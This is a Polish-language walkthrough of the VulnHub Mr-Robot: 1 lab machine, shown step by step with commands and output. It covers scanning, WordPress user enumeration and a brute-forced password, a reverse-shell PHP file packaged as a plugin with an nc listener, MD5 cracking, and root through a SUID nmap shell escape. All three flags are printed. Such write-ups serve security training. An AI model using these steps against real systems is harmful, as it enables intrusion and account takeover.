Vulnhub: Mr-Robot: 1

Dzisiaj zaprezentuję wam jak uzyskać wszystkie 3 klucze z obrazu Mr-Robot: 1 dostępnego tutaj: https://www.vulnhub.com/entry/mr-robot-1,151/ , a więc do dzieła 🙂

co to sprawdzamy jaki ma IP nasza virtualka, wiem tylko tyle, że w mojej sieci dostanie IP z klasy 192.168.1.0/24, a więc uruchamiamy:

netdiscover -r 192.168.1.0/24

Uzyskamy taki wynik:

$ netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
22 Captured ARP Req/Rep packets, from 11 hosts. Total size: 1324
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — –
[…]
192.168.1.165 08:00:27:10:7f:e3 2 120 PCS Systemtechnik GmbH
[…]

Adres IP być inny, gdyż jest on pobierany z DHCP 🙂

następnie skanuję go nmap`em:

$ nmap 192.168.1.165
Starting Nmap 7.70 ( https://nmap.org ) at 2019–07–06 19:00 CEST
Nmap scan report for linux.localdomain (192.168.1.165)
Host is up (0.00018s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 08:00:27:10:7F:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

Jak widzimy jest otwarty port SSH/HTTP/HTTPS zobaczmy więc co jest na tej stronie:

Nic ciekawego więc puśćmy dirb z opcją big.txt:

$ dirb http://192.168.1.165/ -w /usr/share/wordlists/dirb/big.txt

a za ten czas zobaczmy czy nie ma czasami pliku robots.txt:

$ curl http://192.168.1.165/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

Widzimy plik key-1-of-3.txt sprawdźmy go:

curl http://192.168.1.165/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Tym oto sposobem uzyskaliśmy 1 klucz z tej wirtualki 🙂 gratuluję 🙂

Wracamy do wyników dirb`a:

$ dirb http://192.168.1.165/ -w /usr/share/wordlists/dirb/big.txt
— — — — — — — — –
DIRB v2.22
By The Dark Raver
— — — — — — — — –

START_TIME: Sat Jul 6 18:54:35 2019
URL_BASE: http://192.168.1.165/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

— — — — — — — — –
GENERATED WORDS: 4612
— — Scanning URL: http://192.168.1.165/ — —
==> DIRECTORY: http://192.168.1.165/0/
==> DIRECTORY: http://192.168.1.165/admin/
+ http://192.168.1.165/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.165/audio/
^C

i zauważamy ścieżkę /0/, więc próbujemy zobaczyć co tam jest:

Ukazuje nam się popularny CMS wordpress 🙂

Uruchamiamy więc wp-scan:

wpscan — url http://192.168.1.165/0 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.5.4
Sponsored by Sucuri — https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

Scan Aborted: Unable to identify the wp-content dir, please supply it with — wp-content-dir, use the — scope option or make sure the — url value given is the correct one

niestety jest błąd, ponieważ katalog wp-content nie jest w /0/wp-content , a w /wp-content, a więc dopisujemy:

$ wpscan — url http://192.168.1.165/0 -e u — wp-content-dir wp-content
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.5.4
Sponsored by Sucuri — https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.1.165/0/
[+] Started: Sat Jul 6 19:11:45 2019

Interesting Finding(s):

[+] http://192.168.1.165/0/
| Interesting Entries:
| — Server: Apache
| — X-Powered-By: PHP/5.5.29
| — X-Mod-Pagespeed: 1.9.32.3–4523
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.1.165/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| — Link Tag (Passive Detection), 30% confidence
| — Direct Access (Aggressive Detection), 100% confidence
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress version 4.3.19 identified (Latest, released on 2019–03–13).
| Detected By: Rss Generator (Passive Detection)
| — http://192.168.1.165/feed/, <generator>https://wordpress.org/?v=4.3.19</generator>
| — http://192.168.1.165/comments/feed/, <generator>https://wordpress.org/?v=4.3.19</generator>

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:00 <================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] mich05654
| Detected By: Author Id Brute Forcing — Author Pattern (Aggressive Detection)

[+] elliot
| Detected By: Author Id Brute Forcing — Author Pattern (Aggressive Detection)

[+] Finished: Sat Jul 6 19:11:48 2019
[+] Requests Done: 45
[+] Cached Requests: 9
[+] Data Sent: 7.251 KB
[+] Data Received: 142.523 KB
[+] Memory used: 79.816 MB
[+] Elapsed time: 00:00:02

Ukazują nam się 2 użytkowników: elliot, oraz mich05654… przypominamy sobie, że w pliku robots.txt był także plik: fsocity.dic więc próbujemy go pobrać:

wget http://192.168.1.165/fsocity.dic
— 2019–07–06 22:53:56 — http://192.168.1.165/fsocity.dic
Łączenie się z 192.168.1.165:80… połączono.
Żądanie HTTP wysłano, oczekiwanie na odpowiedź… 200 OK
Długość: 7245381 (6,9M) [text/x-c]
Zapis do: `fsocity.dic’

fsocity.dic 100%[=================================================================================================================>] 6,91M 37,1MB/s w 0,2s

2019–07–06 22:53:56 (37,1 MB/s) — zapisano `fsocity.dic’ [7245381/7245381]

Sprawdzamy zawartość tego pliku:

# cat fsocity.dic | head -n 5
true
false
wikia
from
the

wygląda na jakiś słownik, a więc próbujemy robić brute-force tym słownikiem użytkownika elliot:

$ wpscan — url http://192.168.1.165/0 — wp-content-dir wp-content -U elliot -P fsocity.dic
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.5.4
Sponsored by Sucuri — https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.1.165/0/
[+] Started: Sat Jul 6 21:09:51 2019

Interesting Finding(s):

[+] http://192.168.1.165/0/
| Interesting Entries:
| — Server: Apache
| — X-Powered-By: PHP/5.5.29
| — X-Mod-Pagespeed: 1.9.32.3–4523
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.1.165/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| — Link Tag (Passive Detection), 30% confidence
| — Direct Access (Aggressive Detection), 100% confidence
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress version 4.3.19 identified (Latest, released on 2019–03–13).
| Detected By: Rss Generator (Passive Detection)
| — http://192.168.1.165/feed/, <generator>https://wordpress.org/?v=4.3.19</generator>
| — http://192.168.1.165/comments/feed/, <generator>https://wordpress.org/?v=4.3.19</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:00 <=================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:34:36 <===============================================================================================================================================> (1716 / 1716) 100.00% Time: 00:34:36
WARNING: Your progress bar is currently at 1716 out of 1716 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Progress Time: 00:34:36 <===============================================================================================================================================> (1716 / 1716) 100.00% Time: 00:34:36
[SUCCESS] — elliot / ER28–0652
All Found

[i] Valid Combinations Found:
| Username: elliot, Password: ER28–0652

[+] Finished: Sat Jul 6 21:44:30 2019
[+] Requests Done: 1761
[+] Cached Requests: 7
[+] Data Sent: 414.387 KB
[+] Data Received: 175.93 MB
[+] Memory used: 360.078 MB
[+] Elapsed time: 00:34:38

I zostało znalezione hasło 😀 login to: elliot hasło to: ER28–0652, więc przechodzimy do http://192.168.1.165/wp-admin i logujemy się powyżej podanymi danymi i… widzimy panel wordpressa…

Próbujemy dodać własny plugin z reverse shell, a więc przechodzimy do zakładki Plugins -> Add New

i naciskamy przycisk Upload Plugin.

Teraz przygotowywujemy sobie plugin do wordpressa.

Pobieramy z tego gita: https://github.com/pentestmonkey/php-reverse-shell plik o nazwie: php-reverse-shell.php i go delikatnie przerabiamy. Mianowicie na samym początku tego pliku zaraz po <?php dodajemy:

/*
Plugin Name: BlackRoomSec’s Evil Reverse Shell
Plugin URI: https://www.blackroomsec.com
Description: Gets Tara into your cybers, duh!
Version: 1.0 baby
Author: BRS
Author URI: http://www.blackroomsec.com
Text Domain: evil-shell
Domain Path: /languages
*/

Oraz kilka linijek później zmieniamy:

$ip = ‘127.0.0.1’; // CHANGE THIS

pakujemy ten plik w zip:

$ zip plugin.zip php-reverse-shell.php
adding: php-reverse-shell.php (deflated 58%)

i następnie plik plugin.zip wysyłamy na serwer, jak każdy inny plugin wordpressa 🙂 . Zanim jednak klikniemy Activate Plugin, uruchamiamy program, który nasłuchuje na porcie 1234 na naszym komputerze/laptopie:

nc -lvp 1234

Klikamy activate plugin i naszym oczom ukazuje się:

$ nc -lvp 1234
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.165.
Ncat: Connection from 192.168.1.165:42530.
Linux linux 3.13.0–55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
20:27:45 up 3:37, 0 users, load average: 0.00, 0.01, 0.10
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can’t access tty; job control turned off
$

wpisując polecenie id widzimy, że jesteśmy zalogowani jako:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Poprawiamy sobie “wygląd terminala” na /bin/bash poleceniem:

python -c “import pty;pty.spawn(‘/bin/bash’)”

przechodzimy do katalogu /home/robot:

cd /home/robot

i listujemy pliki:

$ ls -l
ls -l
total 8
-r — — — — 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r — r — 1 robot robot 39 Nov 13 2015 password.raw-md5
[email protected]:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
[email protected]:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Jak widzimy nie umiemy jeszcze odczytać klucza key-2-of-3.txt, ale za to umiemy odczytać plik password.raw-md5, więc wchodzimy na stronę:MD5HashingUltimate Hashing and Anonymity toolkitmd5hashing.net

i próbujemy zdecryptować algorytm md5.
udaje nam się to i dostajemy wynik: abcdefghijklmnopqrstuvwxyz

Próbujemy się zalogować jako user robot:

$ su — robot
su — robot
Password: abcdefghijklmnopqrstuvwxyz

i udaje nam się zalogować jesteśmy jako user robot, więc odczytujemy plik key-2-of-3.txt:

$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Szukamy programu, dzięki którym możliwa będzie eskalacja uprawnień do root:

find / -user root -perm -4000 -print
find / -user root -perm -4000 -print
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
find: `/etc/ssl/private’: Permission denied
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap

Zauważamy, że jest program nmap, który pozwala nam na eskalację uprawnień do roota: https://pentestlab.blog/category/privilege-escalation/

a więc uruchamiamy go:

$ nmap — interactive
nmap — interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#

i już jesteśmy jako root 🙂

następnie przechodzimy do katalogu /root i patrzymy jakie ma pliki:

# cd /root
cd /root
# ls -l
ls -l
total 4
-rw-r — r — 1 root root 0 Nov 13 2015 firstboot_done
-r — — — — 1 root root 33 Nov 13 2015 key-3-of-3.txt
#

czytamy plik key-3-of-3.txt:

# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

i tym oto sposobem rozwiązaliśmy virtualkę z VulnHub (Mr-Robot: 1)

Polecam każdemu spróbować samemu rozwiązać tą virtualkę 🙂 .